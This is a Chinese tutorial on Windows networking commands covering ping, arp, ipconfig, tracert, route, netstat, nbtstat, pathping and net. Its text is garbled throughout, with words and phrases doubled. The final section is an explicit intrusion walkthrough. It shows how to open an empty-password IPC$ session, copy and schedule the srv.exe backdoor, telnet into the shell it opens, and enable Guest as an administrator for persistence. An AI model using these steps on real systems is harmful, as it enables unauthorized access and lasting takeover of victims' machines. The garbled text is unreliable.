网络常用命令及故障排查

1、网络常用命令及故障诊断运行此命令可快速进入运行此命令可快速进入Windows的命令行模式（适用于的命令行模式（适用于Windows2000以上的操作系统），点击以上的操作系统），点击“开始开始”-“运行运行”-“cmd”即即可。可。 原理原理 : 源站点向目的站点发送源站点向目的站点发送ICMP request报文报文,目的主机收到后回目的主机收到后回icmp reply 报文报文.这样就验证了两个接点之间这样就验证了两个接点之间IP的可达性。的可达性。功能功能 : 用用ping 来判断两个接点在网络层的连通性。来判断两个接点在网络层的连通性。ping命令参数：命令参数：PING的一些参数：p

2、ing -t -a -n count -l length -f -i ttl -v tos -r count -s count -j computer-list | -k computer-list -w timeout destination-list -t :Ping 指定的计算机直到中断。 -a :将地址解析为计算机名。 -n count :发送 count 指定的 ECHO 数据包数。默认值为 4。-l length :发送包含由 length 指定的数据量的 ECHO 数据包。默认为 32 字节；最大值是65,527。 -f :在数据包中发送不要分段标志。数据包就不会被路由上的网关分

3、段。 -i ttl :将“生存时间”字段设置为 ttl 指定的值。 -v tos :将服务类型字段设置为 tos 指定的值。 -r count :在“记录路由”字段中记录传出和返回数据包的路由。count 可以指定最少 1 台，最多 9 台计算机-s count :指定 count 指定的跃点数的时间戳。-j computer-list :利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。 -k computer-list :利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分

4、隔(路由严格源)IP 允许的最大数量为 9。 -w timeout :指定超时间隔，单位为毫秒。destination-list :指定要 ping 的远程计算机使用Ping命令检查连通性有五个步骤n1. 使用ipconfig /all观察本地网络设置是否正确； n2. Ping 127.0.0.1，127.0.0.1是 回送地址。Ping回送地址是为了检查本地的TCP/IP协议有没有设置好； n3. Ping本机IP地址，这样是为了检查本机的IP地址是否设置有误； n4. Ping本网网关或本网IP地址，这样的是为了检查硬件设备是否有问题，也可以检查本机与本地网络连接是否正常；(在非局域网中

5、这一步骤可以忽略) n5. Ping远程IP地址，这主要是检查本网或本机与外部的连接是否正常。Ping的返回信息 1：Request Time Out “request time out”这提示除了对方可能装有防火墙或已关机以外， 还有就是本机的IP不正确和网关设置错误。 2：Destination Host Unreachable “Destination Net Unreachable”这个信息表示对方主机不存在或者没 有跟对方建立连接 3：Bad IP address 这个信息表示你可能没有连接到DNS服务器所以无法解析这个IP地址，也可能是IP地址不存在。 4：Source quenc

6、h received 这个信息比较特殊，它出现的机率很少。它表示对方或中途的服务器繁忙无法回应。 防范被Pingn随着学校校园网越来越多人使用，用户对网络知识认知的提高，很多人在网上下载一些黑客工具或者用Ping命令，进行扫描端口、IP寻找肉机，带来很坏的影响。nPing命令它可以向你提供的地址发送一个小的数据包，然后侦听这台机器是否有“回答”。查找现在哪些机器在网络上活动。使用Ping入侵即是ICMP 入侵，原理是通过Ping在一个时段内连续向计算机发出大量请求使得计算机的CPU占用率居高不下达到100%而系统死机甚至崩溃。我们可以通过在系统中设置安全策略来防止被ping.常见防范被ping

7、的2种手段n一：利用第三方软件，如天网防火墙、瑞星防火墙等防止被PINGn二：利用系统自带的IP安全策略，其设置分为2步。1是创建IP安全策略；2是指派IP安全策略。具体操作如下：n（一）创建IP安全策略n1、依次单击“开始控制面板管理工具本地安全策略”，打开“本地安全设置”，右击该对话框左侧的“IP安全策略，在本地计算机”选项，执行“创建IP安全策略”命令。n2、在出现的“默认响应规则身份验证方法”对话框中我们选中“此字符串用来保护密钥交换（预共享密钥）”选项，然后在下面的文字框中任意键入一段字符串。（如“禁止 Ping”）n3、完成了IP安全策略的创建工作后在“IP筛选器列表”窗口中单击“

8、添加”按钮，此时将会弹出“IP筛选器向导”窗口，我们单击“下一步”，此时将会弹出“IP通信源”页面，在该页面中设置“源地址”为“我的IP地址”,“目标地址”为“任何IP地址”，任何IP地址的计算机都不能Ping你的机器。4、依次单击“下一步”“完成”，此时，你将会在“IP筛选器列表”看到刚刚创建的筛选器，将其选中后单击“下一步”，我们在出现的“筛选器操作”页面中设置筛选器操作为“需要安全”选项。n（二）指派IP安全策略n安全策略创建完毕后并不能马上生效，我们还需通过“指派”功能令其发挥作用。方法是：在“控制台根节点”中右击“新的IP安全策略”项，然后在弹出的右键菜单中执行“指派”命令，即可启用

9、该策略。n至此，这台主机已经具备了拒绝其他任何机器Ping自己IP地址的功能，不过在本地仍然能够Ping通自己。经过这样的设置之后，所有用户（包括管理员）都不能在其他机器上对此服务器进行Ping操作。从此你再也不用担心被Ping威胁。 另一种有效的方法n许多入侵者喜欢用TTL值来判断操作系统，他们首先会Ping一下你的机子，如看到TTL值为128就认为你的系统为Windows NT/2000，如果TTL值为32则认为目标主机操作系统为Windows 95/98，如果为TTL值为255/64就认为是UNIX/Linux操作系统。(一般情况下Windows系列的系统返回的TTL值在100-130之

10、间，而UNIX/Linux系列的系统返回的TTL值在240-255之间)既然入侵者相信TTL值所反应出来的结果，那么我们不妨修改TTL值来欺骗入侵者，达到保护系统的目的。方法如下：在注册表里，展开”HKEY_LOCAL_MACHINESystemCurrentControlSetServicesTcpipParameters”找到”DefaultTTL n打开Windows自带的“记事本”程序，编写如下所示的批处理命令： echo REGEDIT4>>ChangeTTL.reg echo.>>ChangeTTL.reg echo HKEY

11、_LOCAL_MACHINESystemCurrentControlSetServicesTcpipParameters>>ChangeTTL.reg echo DefaultTTL=dword:000000ff>>ChangeTTL.reg REGEDIT /S /C ChangeTTL.reg 另存为以.bat为扩展名的批处理文件，点击这个文件，你的操作系统的缺省TTL值就会被修改为ff，即十进制的255，即把你的操作系统人为地改为UNIX系统了！ DefaultTTL=dword:000000ff是用来设置系统缺省TTL值的，如果你

12、想将自己的操作系统的TTL值改为其它操作系统的ICMP回显应答值，请改变DefaultTTL的键值，要注意它的键值为16进制。原理原理:arp即地址解析协议即地址解析协议,用于实现第三层到第二层地址的转换，把用于实现第三层到第二层地址的转换，把IP 转化为转化为MAC地址。地址。功能功能:显示和修改显示和修改IP地址与地址与MAC地址的之间映射。地址的之间映射。谁知道谁知道10.1.46.1的的MAC地址地址我知道我知道10.1.46.1的的MAC地址是地址是:xxxxxxarp命令参数：命令参数：arp命令参数：命令参数：arp a :显示所有的显示所有的ARP表项。表项。arp -s:在在

13、ARP缓存中添加一条记录缓存中添加一条记录. C:arp -s 126.13.156.2 02-e0-fc-fe-01-b9arp -d:在在ARP缓存中删除一条记录缓存中删除一条记录. C:arp -d 126.13.156.2arp -g:显示所有的表项显示所有的表项 C:arp -gipconfig 命令获得主机配置信息，包括命令获得主机配置信息，包括 IP 地址、子网掩码和默认网关。地址、子网掩码和默认网关。1、ipconfig 当使用当使用ipconfig时不带任何参数选项，那么它为每个已经配置了的接口显时不带任何参数选项，那么它为每个已经配置了的接口显 示示IP地址、子网掩码和缺省

14、网关值。地址、子网掩码和缺省网关值。 2、ipconfig /all 当使用当使用all选项时，选项时，ipconfig能为能为DNS和和WINS服务器显示它已配置且所要服务器显示它已配置且所要 使用的附加信息（如使用的附加信息（如IP地址等），并且显示内置于本地网卡中的物理地址地址等），并且显示内置于本地网卡中的物理地址 （MAC）。）。3、ipconfig /release和和ipconfig /renew 这是两个附加选项，只能在向这是两个附加选项，只能在向DHCP服务器租用其服务器租用其IP地址的计算机上起作用。地址的计算机上起作用。 如果我们输入如果我们输入ipconfig /rel

15、ease，那么所有接口的租用，那么所有接口的租用IP地址便重新交付给地址便重新交付给 DHCP服务器（归还服务器（归还IP地址）。如果我们输入地址）。如果我们输入ipconfig /renew，那么本地，那么本地 计算机便设法与计算机便设法与DHCP服务器取得联系，并租用一个服务器取得联系，并租用一个IP地址。请注意，地址。请注意， 大多数情况下网卡将被重新赋予和以前所赋予的相同的大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址地址。ipconfig命令示例：命令示例：简介:tracert 是为了探测源节点到目的节点之间数据报文经过的路径。功能:探索两个节点的路由。原理：Tracert

16、 该诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议(ICMP) 回显数据包发送到目标，以决定到达目标采用的路由。要在转发数据包上的 TTL 之前至少递减 1，必需路径上的每个路由器，所以 TTL 是有效的跃点计数。数据包上的 TTL 到达 0 时，路由器应该将“ICMP 已超时”的消息发送回源系统。Tracert 先发送 TTL 为 1 的回显数据包,并在随后的每次发送过程将 TTL递增 1，直到目标响应或 TTL 达到最大值，从而确定路由。路由通过检查中级路由器发送回的“ICMP 已超时”的消息来确定路由。 Tracert 命令按顺序打印出返回“ICMP 已

17、超时”消息的路径中的近端路由器接口列表。如果使用 -d 选项，则 Tracert 实用程序不在每个 IP 地址上查询 DNS。 1.1.1.11.1.1.22.2.2.12.2.2.2TTL=1TTL=2TTL=3tracert命令参数：命令参数：tracert命令参数：命令参数：c:tracert ip_adresstracert命令查看某个地址命令查看某个地址,得到的时间有得到的时间有3个如下个如下 比如比如: 26ms 10ms 10ms. 表示发送的三个探测包的回应时间表示发送的三个探测包的回应时间；一般在网络情况平均的情况下，三个时间差不多；一般在网络情况平均的情况下，三个时间差不多

18、；如果相差比较大，说明网络情况变化比较大如果相差比较大，说明网络情况变化比较大.原理原理: 路由是路由是IP层的核心问题，路由表是层的核心问题，路由表是TCP/IP协议栈所必须的核心协议栈所必须的核心数据结构数据结构,是是IP选路的唯一依据。选路的唯一依据。功能功能:route命令是操作，维护路由表的重要工具。命令是操作，维护路由表的重要工具。route命令参数：命令参数：route命令参数：命令参数：route print 查看路由表查看路由表route命令参数：命令参数：route add 增加一条路由记录增加一条路由记录route命令参数：命令参数：route delete 删除一条路由

19、记录删除一条路由记录route p add 永久地增加一条路由记录永久地增加一条路由记录(重起后不丢失重起后不丢失)几个常用的例子n1：主机路由，从一台主机映射一条到本地网络上的的其他主机上主机路由，从一台主机映射一条到本地网络上的的其他主机上 n我们想为本地主机接口hme0(204.12.17.1)和另一台在相邻才C类网络上的主机(204.12.16.100)之间增加一条路由n#route add -host 204.12.16.100 204.12.17.1 -interface hme0n2：网络路由，允许数据包从本地主机传输到在本地网络的其他主机上网络路由，允许数据包从本地主机传输到在

20、本地网络的其他主机上 n如果我们要想为C类网掩码在本地主机(204.12.17.1)和我们上面指出的网络之间增加一条路由(204.12.16.0网络)我们可以使用如下的命令：n#route add -net 204.12.16.0 204.12.17.1 -netmask 255.255.255.0 n3：添加目标为 10.41.0.0 ，子网掩码为 255.255.0.0 ，下一个跃点地址为 10.27.0.1 的路由，执行以下命令： nroute add 10.41.0.0 mask 255.255.0.0 10.27.0.1 n要显示 IP 路由表中以 192. 开始的路由 添加默认网关

21、地址为 192.168.1.7 的默认路由 功能：功能：netstat命令是监视网络非常有用的工具，支持命令是监视网络非常有用的工具，支持TCP/IP协议协议。它可以显示网络的路由表（。它可以显示网络的路由表（route table），实际的网络连接和每），实际的网络连接和每个网络接口设备的状态信息。个网络接口设备的状态信息。netstat命令参数：命令参数：NETSTAT -a -b -e -n -o -p proto -r -s -v interval-a：显示所有连接和监听端口：显示所有连接和监听端口。-b：显示包含于创建每个连接或监听端口的可执行组件。：显示包含于创建每个连接或监听端口

22、的可执行组件。-e：显示以太网统计信息，此选项可以与：显示以太网统计信息，此选项可以与-s选项组合使用。选项组合使用。-n：以数字形式显示地址和端口号：以数字形式显示地址和端口号。-o：显示与每个连接相关的所属进程：显示与每个连接相关的所属进程 ID。-p：显示：显示proto指定的协议的连接指定的协议的连接。协议可以是下列协议之一。协议可以是下列协议之一: TCP、UDP、TCPv6 或或 UDPv6。-r：显示路由表。：显示路由表。(与与route print 一样一样)-s：显示按协议统计信息。默认显示：显示按协议统计信息。默认显示 IP、IPv6、ICMP、ICMPv6、TCP、TCP

23、v6、UDP 和和 UDPv6的统计信息。的统计信息。-v：与：与 -b 选项一起使用时将显示包含于为所有可执行组件创建连接或监听端选项一起使用时将显示包含于为所有可执行组件创建连接或监听端口的组件。口的组件。interval：重新显示选定统计信息，每次显示之间暂停时间间隔（以秒计）。：重新显示选定统计信息，每次显示之间暂停时间间隔（以秒计）。按按 ctrl+c停止重新显示统计信息。如果省略，停止重新显示统计信息。如果省略，netstat显示当前配置信息（只显示当前配置信息（只显示一次）显示一次）netstat命令注释：命令注释：Local Address：本地地址：本地地址Foreign A

24、ddress：外部地址：外部地址PID：进程号：进程号State：状态，主要有以下几种：状态，主要有以下几种：LISTENING：侦听来自远方的：侦听来自远方的TCP端口的连接请求端口的连接请求ESTABLISHED：代表一个打开的连接正在通信：代表一个打开的连接正在通信 TIME_WAIT：等待足够的时间以确保远程：等待足够的时间以确保远程TCP接收到连接中断请求接收到连接中断请求的确认的确认CLOSE-WAIT：等待从本地用户发来的连接中断请求：等待从本地用户发来的连接中断请求CLOSING：等待远程：等待远程TCP对连接中断的确认对连接中断的确认 CLOSED：没有任何连接状态：没有任何

25、连接状态netstat命令参数：命令参数：最常用的：最常用的：netstat -ano 列出所有联机状态列出所有联机状态*一种特殊的一种特殊的netstat连接情况，分析原因。连接情况，分析原因。功能：功能：nbtstat命令是解决命令是解决NetBIOS名称解析问题的有用工具。可以名称解析问题的有用工具。可以使用使用nbtstat命令删除或更正预加载的项目命令删除或更正预加载的项目NETBIOS名字分两种类型：名字分两种类型：唯一名唯一名(UNIQUE)和组名和组名(GROUP)。唯一名很好理解，就是说在同一。唯一名很好理解，就是说在同一子网上要独一为二；而组名的作用是可以实现多播数据通讯。

26、子网上要独一为二；而组名的作用是可以实现多播数据通讯。net命令的基本语法如下：命令的基本语法如下：nbtstat命令参数：命令参数：nbtstat -n 显示显示由服务器或重定向器之类的程序在系统上本地注册的名称由服务器或重定向器之类的程序在系统上本地注册的名称。nbtstat命令参数：命令参数：nbtstat a ip_address 使用远程计算机的使用远程计算机的IP地址并列出名称表地址并列出名称表nbtstat a remotename 对指定对指定name的计算机执行的计算机执行NetBIOS适配器状态命适配器状态命令令。适配器状态命令将返回计算机的本地。适配器状态命令将返回计算机

27、的本地NetBIOS名称表名称表，以及适配器的媒，以及适配器的媒体访问控制地址。体访问控制地址。功能：功能：pathping 命令是一个路由跟踪工具，它将命令是一个路由跟踪工具，它将ping和和tracert 命令的功能和这两命令的功能和这两个工具所不提供的其他信息结合起来。个工具所不提供的其他信息结合起来。pathping命令在一段时间内将数据包发送到到命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器，然后基于数据包的计算机结果从每个跃点返回。达最终目标的路径上的每个路由器，然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度，因此可以

28、很容易地确定由于命令显示数据包在任何给定路由器或链接上丢失的程度，因此可以很容易地确定可能导致网络问题的路由器或链接。可能导致网络问题的路由器或链接。Pathping 目标。这里的目标可以是一个主机名称也可以是一个目标。这里的目标可以是一个主机名称也可以是一个IP地址。地址。 例如，例如，或者或者209.217.46.121。 接下来，你将得到一个分为两部分的报告。第一部分是通向目的地的线路上的每一个接下来，你将得到一个分为两部分的报告。第一部分是通向目的地的线路上的每一个跳点的列表，第二部分是每一个跳点的统计，包括每一个跳点的数据包丢失的数量。跳点的列表，第二部分是每一个跳点的统计，包括每一

29、个跳点的数据包丢失的数量。它使用下面例子中显示的一些开关它使用下面例子中显示的一些开关(switch)，最常用的最常用的： pathpingpathping -n -w 1000 210.28.112.143 -n -w 1000 210.28.112.143这个命令告诉这个命令告诉pathping不解析路由器的不解析路由器的IP地址，并且为每一个回显应答信息等待地址，并且为每一个回显应答信息等待1秒秒钟钟(1000毫秒毫秒)。 下面是一些最重要的下面是一些最重要的pathping命令命令: n 不显示每一台路由器的主机名。不显示每一台路由器的主机名。 hvalue 设置跟踪到目的地的最大跳点

30、数量。默认是设置跟踪到目的地的最大跳点数量。默认是30个跳点。个跳点。 wvalue 设置等待应答的最多时间设置等待应答的最多时间(按毫秒计算按毫秒计算)。 p 设置在发出新的设置在发出新的ping命令之前等待的时间命令之前等待的时间(按毫秒计算按毫秒计算)。默认是。默认是250毫秒。毫秒。 qvalue 设置设置ICMP回显请求信息发送的数量。默认是回显请求信息发送的数量。默认是100。 pathping命令参数：命令参数：pathping命令参数：命令参数：c:pathping ip_adress功能：功能：net命令是一个命令行命令，命令是一个命令行命令，Net 命令有很多函数用于实命令

31、有很多函数用于实用和核查计算机之间的用和核查计算机之间的NetBIOS连接，可以查看我们的管理网络连接，可以查看我们的管理网络环境、服务、用户、登陆等信息内容。环境、服务、用户、登陆等信息内容。net命令的基本语法如下：命令的基本语法如下：net命令参数：命令参数：c:net view作用：显示域列表、计算机列表或指定计算机的共享资源列表。作用：显示域列表、计算机列表或指定计算机的共享资源列表。 命令格式：命令格式：net view computername | /domain:domainname 有关参数说明：有关参数说明： 键入不带参数的键入不带参数的net view显示当前域的计算机列

32、表显示当前域的计算机列表 computer name 指定要查看其共享资源的计算机指定要查看其共享资源的计算机 /domain :domain name 指定要查看其可用计算机的域指定要查看其可用计算机的域 例如：例如：net view xhwl-server /查看查看xhwl-server计算机的共享计算机的共享资源列表。资源列表。net view /domain:XYZ /查看查看XYZ域中的机器列表域中的机器列表net命令参数：命令参数：c:net user作作 用：添加或更改用户帐号或显示用户帐号信息。用：添加或更改用户帐号或显示用户帐号信息。 命令格式：命令格式：net user

33、username password | * options /domain 有关参数说明：有关参数说明： 键入不带参数的键入不带参数的net user查看计算机上的用户帐号列表查看计算机上的用户帐号列表 username添加、删除、更改或查看用户帐号名添加、删除、更改或查看用户帐号名 password为用户帐号分配或更改密码为用户帐号分配或更改密码提示输入密码提示输入密码 /domain在计算机主域的主域控制器中执行操作。在计算机主域的主域控制器中执行操作。例如例如：net user test /查看用户查看用户test的信息。的信息。 net命令参数：命令参数：c:net use作作 用：连

34、接计算机或断开计算机与共享资源的连接，或显示用：连接计算机或断开计算机与共享资源的连接，或显示 计算机的连接信息。计算机的连接信息。 命令格式：命令格式：Net use devicename | * computernamesharenamevolume password|* /user:domain nameusername /delete| /persistent:yes|no 例如：例如：net use f: GHQTEMP /将将GHQTEMP目录建立为目录建立为F盘盘net use f: GHQTEMP /delete /断开连接断开连接net命令参数：命令参数：c:net use有

35、关参数说明：有关参数说明：键入不带参数的键入不带参数的net use列出网络连接列出网络连接 devicename指定要连接到的资源名称或要断开的设备名称指定要连接到的资源名称或要断开的设备名称 computernamesharename服务器及共享资源的名称服务器及共享资源的名称 password访问共享资源的密码访问共享资源的密码 *提示键入密码提示键入密码 /user指定进行连接的另外一个用户指定进行连接的另外一个用户 domainname指定另一个域指定另一个域 username指定登录的用户名指定登录的用户名 /delete取消指定网络连接取消指定网络连接 /persistent控制

36、永久网络连接的使用。控制永久网络连接的使用。net命令参数：命令参数：c:net send作作 用：向网络的其他用户、计算机或通信名发送消息。用：向网络的其他用户、计算机或通信名发送消息。 命令格式：命令格式：Net send name | * | /domain:name | /users message 有关参数说明：有关参数说明：name要接收发送消息的用户名、计算机名或通信名要接收发送消息的用户名、计算机名或通信名 * 将消息发送到组中所有名称将消息发送到组中所有名称 /domain:name将消息发送到计算机域中的所有名称将消息发送到计算机域中的所有名称 /users将消息发送到与服

37、务器连接的所有用户将消息发送到与服务器连接的所有用户message作为消息发送的文本作为消息发送的文本 例如：例如：net send /users server will shutdown in 10 minutes/给所有连接到服务器的用户发送消息给所有连接到服务器的用户发送消息 net命令参数：命令参数：c:net start作用：启动服务，或显示已启动服务的列表作用：启动服务，或显示已启动服务的列表命令格式：命令格式：net start service c:net pause作用：暂停正在运行的服务作用：暂停正在运行的服务 命令格式：命令格式：net pause servicec:net

38、 continue作用：重新激活挂起的服务作用：重新激活挂起的服务 命令格式：命令格式：net continue service c:net stop作用：停止作用：停止 Windows NT/2000/2003 网络服务网络服务命令格式：命令格式：net stop serviceNet 命令的典型用法ipc$连接1. C:net use 127.0.0.1IPC$ “” /user:“admintitrators” 这是用流光扫到的用户名是administrators，密码为“空”的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接

39、，因为密码为“空”，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。2. C:copy srv.exe 127.0.0.1admin$ 先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:winntsystem32，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。3. C:net time 127.0.0.1 查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。4. C:at 127.0.0.1 11:05 srv.exe 用

40、at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！） 5. C:net time 127.0.0.1再查查到时间没有？如果127.0.0.1 的当前时间是相同，那就准备开始下面的命令。6. C:telnet 127.0.0.1 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了n7.C:copy ntlm.exe 127.0.0

41、.1admin$用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在流光的Tools目录中）。8. C:WINNTsystem32ntlm 输入ntlm启动（这里的C:WINNTsystem32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现DONE的时候，就说明已经启动正常。然后使用net start telnet来开启Telnet服务！ 9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！为了以防万一,我们再把guest激活加到管理组 10. C:net user guest /active:y

42、es 将对方的Guest用户激活11. C:net user guest 1234 将Guest的密码改为1234,或者你要设定的密码12. C:net localgroup administrators guest /add 将Guest变为Administrator_(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)总结nnet use ipipc$ /user: 建立IPC空链接 net use ipipc$ 密码 /user:用户名 建立IPC非空链接 net use h: ipc$ 密码 /user:用户名 直接登陆后映射对方C：到本地为H:

43、 net use h: ipc$ 登陆后映射对方C：到本地为H: net use ipipc$ /del 删除IPC链接 net user 用户名密码/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把用户添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务；(如:net start telnet， net start schedule) net stop 服务名 停止某服务 net